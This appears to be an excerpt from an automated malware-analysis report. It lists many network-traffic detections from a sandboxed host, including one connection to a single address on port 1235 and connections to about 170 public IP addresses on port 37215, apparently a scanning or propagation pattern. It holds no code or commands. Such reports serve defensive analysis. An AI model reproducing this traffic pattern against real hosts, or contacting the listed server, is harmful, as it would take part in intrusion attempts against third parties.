                Source: unknownNetwork traffic detected: HTTP traffic on port 41296 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 60994 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 58548 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 35048 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 54292 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 55934 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 60722 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 49576 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 59794 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 50374 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 48580 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 55016 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 50294 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 54904 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 47302 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 43460 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 51670 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 51348 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 35414 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 54882 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 48484 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 34468 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 44146 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 39212 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 59990 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 60716 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 42462 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 51362 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 39662 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 50590 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 45962 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 36636 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 56224 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 35674 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 53628 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 41150 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 45338 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 46688 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 48664 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 50674 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 56290 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 46222 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 55774 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 39322 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 58852 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 53174 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 56678 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 34734 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 57634 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 51440 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 42744 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 41704 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 45992 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 56568 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 48486 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 60076 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 40186 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 46430 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 33168 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 54778 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 54326 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 37280 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 49202 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 40638 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 53650 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 38150 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 48334 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 46018 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 43690 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 58246 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 48306 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 39314 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 34940 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 48876 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 33974 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 42994 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 58528 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 53096 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 39180 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 42836 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 46838 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 45112 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 57272 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 34798 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 59754 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 60046 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 42652 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 44468 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 50724 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 49016 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 60032 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 48698 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 34062 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 35788 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 38784 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 56614 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 37688 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 56742 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 36572 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 56770 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 37264 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 44716 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 36638 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 56002 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 52610 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 57156 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 55858 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 50118 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 44812 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 41666 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 48460 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 46822 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 38174 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 40134 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 42864 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 39960 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 49208 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 53616 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 41596 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 51686 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 39884 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 51722 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 58394 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 42448 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 41654 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 38378 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 40098 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 36988 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 52668 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 47580 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 49140 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 33400 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 44662 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 58346 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 47782 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 57724 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 55876 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 52092 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 38138 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 37768 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 53036 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 54086 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 60370 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 49148 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 46870 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 49564 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 48750 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 44916 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 46306 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 49534 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 45618 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 59138 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 38878 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 57234 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 54534 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 45118 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 34836 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 49982 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 48608 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 60516 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 36448 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 39690 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 50492 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 37648 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 56000 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 50954 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 46034 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 37888 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 40070 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 37502 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 49678 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 58358 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 56430 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 60284 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 53774 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 44044 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 44408 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 42642 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 58948 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 57106 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 41708 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 35168 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 48482 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 42880 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 49058 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 51156 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 41914 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 54258 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 49102 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 58500 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 35412 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 35002 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 50306 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 45542 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 34758 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 55108 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 59126 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 55990 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 44466 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 57650 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 35158 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 46822 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 57050 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 59164 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 47240 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 48142 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 48956 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 51524 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 60318 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 45738 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 56814 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 55104 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 60054 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 54810 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 34338 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 33156 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 40472 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 33968 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 41490 -> 37215
                Source: global trafficTCP traffic: 192.168.2.13:38292 -> 94.156.66.70:1235
                Source: global trafficTCP traffic: 192.168.2.13:51171 -> 41.253.54.214:37215
                Source: global trafficTCP traffic: 192.168.2.13:51171 -> 41.25.99.190:37215
                Source: global trafficTCP traffic: 192.168.2.13:51171 -> 41.24.33.192:37215
                Source: global trafficTCP traffic: 192.168.2.13:51171 -> 157.180.28.183:37215
                Source: global trafficTCP traffic: 192.168.2.13:51171 -> 157.35.60.48:37215
                Source: global trafficTCP traffic: 192.168.2.13:51171 -> 157.180.173.191:37215
                Source: global trafficTCP traffic: 192.168.2.13:51171 -> 197.93.16.112:37215
                Source: global trafficTCP traffic: 192.168.2.13:51171 -> 14.200.223.32:37215
                Source: global trafficTCP traffic: 192.168.2.13:51171 -> 41.74.194.211:37215
                Source: global trafficTCP traffic: 192.168.2.13:51171 -> 157.238.133.247:37215
                Source: global trafficTCP traffic: 192.168.2.13:51171 -> 157.46.117.85:37215
                Source: global trafficTCP traffic: 192.168.2.13:51171 -> 76.254.221.237:37215
                Source: global trafficTCP traffic: 192.168.2.13:51171 -> 157.158.61.23:37215
                Source: global trafficTCP traffic: 192.168.2.13:51171 -> 157.239.105.202:37215
                Source: global trafficTCP traffic: 192.168.2.13:51171 -> 132.117.166.187:37215
                Source: global trafficTCP traffic: 192.168.2.13:51171 -> 197.188.173.27:37215
                Source: global trafficTCP traffic: 192.168.2.13:51171 -> 157.168.238.158:37215
                Source: global trafficTCP traffic: 192.168.2.13:51171 -> 41.205.176.172:37215
                Source: global trafficTCP traffic: 192.168.2.13:51171 -> 104.26.16.169:37215
                Source: global trafficTCP traffic: 192.168.2.13:51171 -> 84.15.201.207:37215
                Source: global trafficTCP traffic: 192.168.2.13:51171 -> 197.132.126.127:37215
                Source: global trafficTCP traffic: 192.168.2.13:51171 -> 141.230.63.70:37215
                Source: global trafficTCP traffic: 192.168.2.13:51171 -> 197.233.38.30:37215
                Source: global trafficTCP traffic: 192.168.2.13:51171 -> 157.197.52.210:37215
                Source: global trafficTCP traffic: 192.168.2.13:51171 -> 75.123.100.201:37215
                Source: global trafficTCP traffic: 192.168.2.13:51171 -> 197.225.2.255:37215
                Source: global trafficTCP traffic: 192.168.2.13:51171 -> 157.189.14.204:37215
                Source: global trafficTCP traffic: 192.168.2.13:51171 -> 197.214.69.128:37215
                Source: global trafficTCP traffic: 192.168.2.13:51171 -> 41.157.25.231:37215
                Source: global trafficTCP traffic: 192.168.2.13:51171 -> 41.247.124.128:37215
                Source: global trafficTCP traffic: 192.168.2.13:51171 -> 157.207.9.185:37215
                Source: global trafficTCP traffic: 192.168.2.13:51171 -> 197.70.184.219:37215
                Source: global trafficTCP traffic: 192.168.2.13:51171 -> 157.242.182.173:37215
                Source: global trafficTCP traffic: 192.168.2.13:51171 -> 41.22.233.248:37215
                Source: global trafficTCP traffic: 192.168.2.13:51171 -> 41.86.141.198:37215
                Source: global trafficTCP traffic: 192.168.2.13:51171 -> 41.189.123.241:37215
                Source: global trafficTCP traffic: 192.168.2.13:51171 -> 197.151.53.151:37215
                Source: global trafficTCP traffic: 192.168.2.13:51171 -> 197.32.143.1:37215
                Source: global trafficTCP traffic: 192.168.2.13:51171 -> 157.42.192.27:37215
                Source: global trafficTCP traffic: 192.168.2.13:51171 -> 41.223.52.113:37215
                Source: global trafficTCP traffic: 192.168.2.13:51171 -> 41.194.237.177:37215
                Source: global trafficTCP traffic: 192.168.2.13:51171 -> 157.181.3.65:37215
                Source: global trafficTCP traffic: 192.168.2.13:51171 -> 157.31.244.233:37215
                Source: global trafficTCP traffic: 192.168.2.13:51171 -> 157.162.111.165:37215
                Source: global trafficTCP traffic: 192.168.2.13:51171 -> 48.58.83.67:37215
                Source: global trafficTCP traffic: 192.168.2.13:51171 -> 41.230.206.92:37215
                Source: global trafficTCP traffic: 192.168.2.13:51171 -> 157.130.127.237:37215
                Source: global trafficTCP traffic: 192.168.2.13:51171 -> 41.200.75.196:37215
                Source: global trafficTCP traffic: 192.168.2.13:51171 -> 41.106.19.91:37215
                Source: global trafficTCP traffic: 192.168.2.13:51171 -> 171.114.236.11:37215
                Source: global trafficTCP traffic: 192.168.2.13:51171 -> 47.66.136.162:37215
                Source: global trafficTCP traffic: 192.168.2.13:51171 -> 197.43.88.75:37215
                Source: global trafficTCP traffic: 192.168.2.13:51171 -> 87.196.57.107:37215
                Source: global trafficTCP traffic: 192.168.2.13:51171 -> 157.200.19.129:37215
                Source: global trafficTCP traffic: 192.168.2.13:51171 -> 157.162.181.68:37215
                Source: global trafficTCP traffic: 192.168.2.13:51171 -> 157.140.111.238:37215
                Source: global trafficTCP traffic: 192.168.2.13:51171 -> 197.52.74.52:37215
                Source: global trafficTCP traffic: 192.168.2.13:51171 -> 41.254.106.211:37215
                Source: global trafficTCP traffic: 192.168.2.13:51171 -> 197.105.242.89:37215
                Source: global trafficTCP traffic: 192.168.2.13:51171 -> 157.79.152.209:37215
                Source: global trafficTCP traffic: 192.168.2.13:51171 -> 157.193.47.214:37215
                Source: global trafficTCP traffic: 192.168.2.13:51171 -> 41.122.254.113:37215
                Source: global trafficTCP traffic: 192.168.2.13:51171 -> 41.184.85.222:37215
                Source: global trafficTCP traffic: 192.168.2.13:51171 -> 197.169.15.67:37215
                Source: global trafficTCP traffic: 192.168.2.13:51171 -> 157.61.98.233:37215
                Source: global trafficTCP traffic: 192.168.2.13:51171 -> 157.205.108.195:37215
                Source: global trafficTCP traffic: 192.168.2.13:51171 -> 58.171.237.91:37215
                Source: global trafficTCP traffic: 192.168.2.13:51171 -> 177.194.251.112:37215
                Source: global trafficTCP traffic: 192.168.2.13:51171 -> 178.234.84.151:37215
                Source: global trafficTCP traffic: 192.168.2.13:51171 -> 197.75.116.115:37215
                Source: global trafficTCP traffic: 192.168.2.13:51171 -> 57.2.111.215:37215
                Source: global trafficTCP traffic: 192.168.2.13:51171 -> 41.135.106.154:37215
                Source: global trafficTCP traffic: 192.168.2.13:51171 -> 41.137.31.16:37215
                Source: global trafficTCP traffic: 192.168.2.13:51171 -> 41.152.215.135:37215
                Source: global trafficTCP traffic: 192.168.2.13:51171 -> 197.66.192.62:37215
                Source: global trafficTCP traffic: 192.168.2.13:51171 -> 157.133.35.23:37215
                Source: global trafficTCP traffic: 192.168.2.13:51171 -> 41.4.113.224:37215
                Source: global trafficTCP traffic: 192.168.2.13:51171 -> 221.14.147.214:37215
                Source: global trafficTCP traffic: 192.168.2.13:51171 -> 157.23.28.93:37215
                Source: global trafficTCP traffic: 192.168.2.13:51171 -> 197.78.23.106:37215
                Source: global trafficTCP traffic: 192.168.2.13:51171 -> 157.43.178.90:37215
                Source: global trafficTCP traffic: 192.168.2.13:51171 -> 167.226.60.50:37215
                Source: global trafficTCP traffic: 192.168.2.13:51171 -> 50.238.101.54:37215
                Source: global trafficTCP traffic: 192.168.2.13:51171 -> 41.27.132.50:37215
                Source: global trafficTCP traffic: 192.168.2.13:51171 -> 205.5.188.48:37215
                Source: global trafficTCP traffic: 192.168.2.13:51171 -> 157.192.216.123:37215
                Source: global trafficTCP traffic: 192.168.2.13:51171 -> 41.122.176.87:37215
                Source: global trafficTCP traffic: 192.168.2.13:51171 -> 74.129.64.111:37215
                Source: global trafficTCP traffic: 192.168.2.13:51171 -> 122.105.86.215:37215
                Source: global trafficTCP traffic: 192.168.2.13:51171 -> 157.61.158.101:37215
                Source: global trafficTCP traffic: 192.168.2.13:51171 -> 157.127.230.112:37215
                Source: global trafficTCP traffic: 192.168.2.13:51171 -> 157.118.203.59:37215
                Source: global trafficTCP traffic: 192.168.2.13:51171 -> 17.87.28.60:37215
                Source: global trafficTCP traffic: 192.168.2.13:51171 -> 197.154.124.111:37215
                Source: global trafficTCP traffic: 192.168.2.13:51171 -> 157.70.76.195:37215
                Source: global trafficTCP traffic: 192.168.2.13:51171 -> 157.102.232.46:37215
                Source: global trafficTCP traffic: 192.168.2.13:51171 -> 119.20.1.240:37215
                Source: global trafficTCP traffic: 192.168.2.13:51171 -> 41.255.220.110:37215
                Source: global trafficTCP traffic: 192.168.2.13:51171 -> 222.35.243.94:37215
                Source: global trafficTCP traffic: 192.168.2.13:51171 -> 197.240.50.33:37215
                Source: global trafficTCP traffic: 192.168.2.13:51171 -> 197.229.25.11:37215
                Source: global trafficTCP traffic: 192.168.2.13:51171 -> 157.204.251.89:37215
                Source: global trafficTCP traffic: 192.168.2.13:51171 -> 197.1.234.221:37215
                Source: global trafficTCP traffic: 192.168.2.13:51171 -> 41.111.94.122:37215
                Source: global trafficTCP traffic: 192.168.2.13:51171 -> 41.75.196.244:37215
                Source: global trafficTCP traffic: 192.168.2.13:51171 -> 197.211.195.153:37215
                Source: global trafficTCP traffic: 192.168.2.13:51171 -> 197.22.120.224:37215
                Source: global trafficTCP traffic: 192.168.2.13:51171 -> 197.82.16.255:37215
                Source: global trafficTCP traffic: 192.168.2.13:51171 -> 41.253.115.196:37215
                Source: global trafficTCP traffic: 192.168.2.13:51171 -> 1.61.137.124:37215
                Source: global trafficTCP traffic: 192.168.2.13:51171 -> 197.60.10.6:37215
                Source: global trafficTCP traffic: 192.168.2.13:51171 -> 213.3.221.4:37215
                Source: global trafficTCP traffic: 192.168.2.13:51171 -> 41.49.0.166:37215
                Source: global trafficTCP traffic: 192.168.2.13:51171 -> 157.205.187.101:37215
                Source: global trafficTCP traffic: 192.168.2.13:51171 -> 112.145.229.80:37215
                Source: global trafficTCP traffic: 192.168.2.13:51171 -> 41.10.116.54:37215
                Source: global trafficTCP traffic: 192.168.2.13:51171 -> 157.151.201.134:37215
                Source: global trafficTCP traffic: 192.168.2.13:51171 -> 157.118.146.105:37215
                Source: global trafficTCP traffic: 192.168.2.13:51171 -> 157.203.22.176:37215
                Source: global trafficTCP traffic: 192.168.2.13:51171 -> 66.93.247.101:37215
                Source: global trafficTCP traffic: 192.168.2.13:51171 -> 72.21.246.2:37215
                Source: global trafficTCP traffic: 192.168.2.13:51171 -> 197.44.208.178:37215
                Source: global trafficTCP traffic: 192.168.2.13:51171 -> 197.104.30.121:37215
                Source: global trafficTCP traffic: 192.168.2.13:51171 -> 157.105.179.191:37215
                Source: global trafficTCP traffic: 192.168.2.13:51171 -> 4.140.41.134:37215
                Source: global trafficTCP traffic: 192.168.2.13:51171 -> 197.252.255.143:37215
                Source: global trafficTCP traffic: 192.168.2.13:51171 -> 157.205.9.18:37215
                Source: global trafficTCP traffic: 192.168.2.13:51171 -> 41.206.172.218:37215
                Source: global trafficTCP traffic: 192.168.2.13:51171 -> 41.74.224.204:37215
                Source: global trafficTCP traffic: 192.168.2.13:51171 -> 44.165.98.165:37215
                Source: global trafficTCP traffic: 192.168.2.13:51171 -> 190.120.133.217:37215
                Source: global trafficTCP traffic: 192.168.2.13:51171 -> 41.19.104.61:37215
                Source: global trafficTCP traffic: 192.168.2.13:51171 -> 157.3.170.234:37215
                Source: global trafficTCP traffic: 192.168.2.13:51171 -> 181.207.54.45:37215
                Source: global trafficTCP traffic: 192.168.2.13:51171 -> 177.108.32.214:37215
                Source: global trafficTCP traffic: 192.168.2.13:51171 -> 41.78.125.196:37215
                Source: global trafficTCP traffic: 192.168.2.13:51171 -> 157.156.79.99:37215
                Source: global trafficTCP traffic: 192.168.2.13:51171 -> 197.218.50.208:37215
                Source: global trafficTCP traffic: 192.168.2.13:51171 -> 197.38.80.232:37215
                Source: global trafficTCP traffic: 192.168.2.13:51171 -> 35.158.159.64:37215
                Source: global trafficTCP traffic: 192.168.2.13:51171 -> 41.168.46.68:37215
                Source: global trafficTCP traffic: 192.168.2.13:51171 -> 197.195.14.197:37215
                Source: global trafficTCP traffic: 192.168.2.13:51171 -> 197.65.106.151:37215
                Source: global trafficTCP traffic: 192.168.2.13:51171 -> 41.98.148.48:37215
                Source: global trafficTCP traffic: 192.168.2.13:51171 -> 41.76.53.89:37215
                Source: global trafficTCP traffic: 192.168.2.13:51171 -> 41.224.51.221:37215
                Source: global trafficTCP traffic: 192.168.2.13:51171 -> 77.177.4.142:37215
                Source: global trafficTCP traffic: 192.168.2.13:51171 -> 197.10.88.145:37215
                Source: global trafficTCP traffic: 192.168.2.13:51171 -> 41.89.228.105:37215
                Source: global trafficTCP traffic: 192.168.2.13:51171 -> 54.95.80.58:37215
                Source: global trafficTCP traffic: 192.168.2.13:51171 -> 161.44.236.87:37215
                Source: global trafficTCP traffic: 192.168.2.13:51171 -> 66.1.102.203:37215
                Source: global trafficTCP traffic: 192.168.2.13:51171 -> 157.80.162.181:37215
                Source: global trafficTCP traffic: 192.168.2.13:51171 -> 157.221.236.136:37215
                Source: global trafficTCP traffic: 192.168.2.13:51171 -> 220.122.88.108:37215
                Source: global trafficTCP traffic: 192.168.2.13:51171 -> 197.140.138.113:37215
                Source: global trafficTCP traffic: 192.168.2.13:51171 -> 197.31.27.155:37215
                Source: global trafficTCP traffic: 192.168.2.13:51171 -> 41.115.211.107:37215
                Source: global trafficTCP traffic: 192.168.2.13:51171 -> 41.21.255.81:37215
                Source: global trafficTCP traffic: 192.168.2.13:51171 -> 41.162.86.202:37215
                Source: global trafficTCP traffic: 192.168.2.13:51171 -> 41.170.250.245:37215
                Source: global trafficTCP traffic: 192.168.2.13:51171 -> 41.159.106.93:37215
                Source: global trafficTCP traffic: 192.168.2.13:51171 -> 197.178.134.166:37215
                Source: global trafficTCP traffic: 192.168.2.13:51171 -> 41.177.17.210:37215
                Source: global trafficTCP traffic: 192.168.2.13:51171 -> 41.63.235.59:37215
                Source: global trafficTCP traffic: 192.168.2.13:51171 -> 207.186.238.223:37215
                Source: global trafficTCP traffic: 192.168.2.13:51171 -> 157.160.186.220:37215
                Source: global trafficTCP traffic: 192.168.2.13:51171 -> 41.37.54.218:37215
                Source: global trafficTCP traffic: 192.168.2.13:51171 -> 41.246.17.1:37215
                Source: global trafficTCP traffic: 192.168.2.13:51171 -> 100.167.134.29:37215
                Source: global trafficTCP traffic: 192.168.2.13:51171 -> 157.116.143.117:37215
                Source: global trafficTCP traffic: 192.168.2.13:51171 -> 197.16.124.152:37215
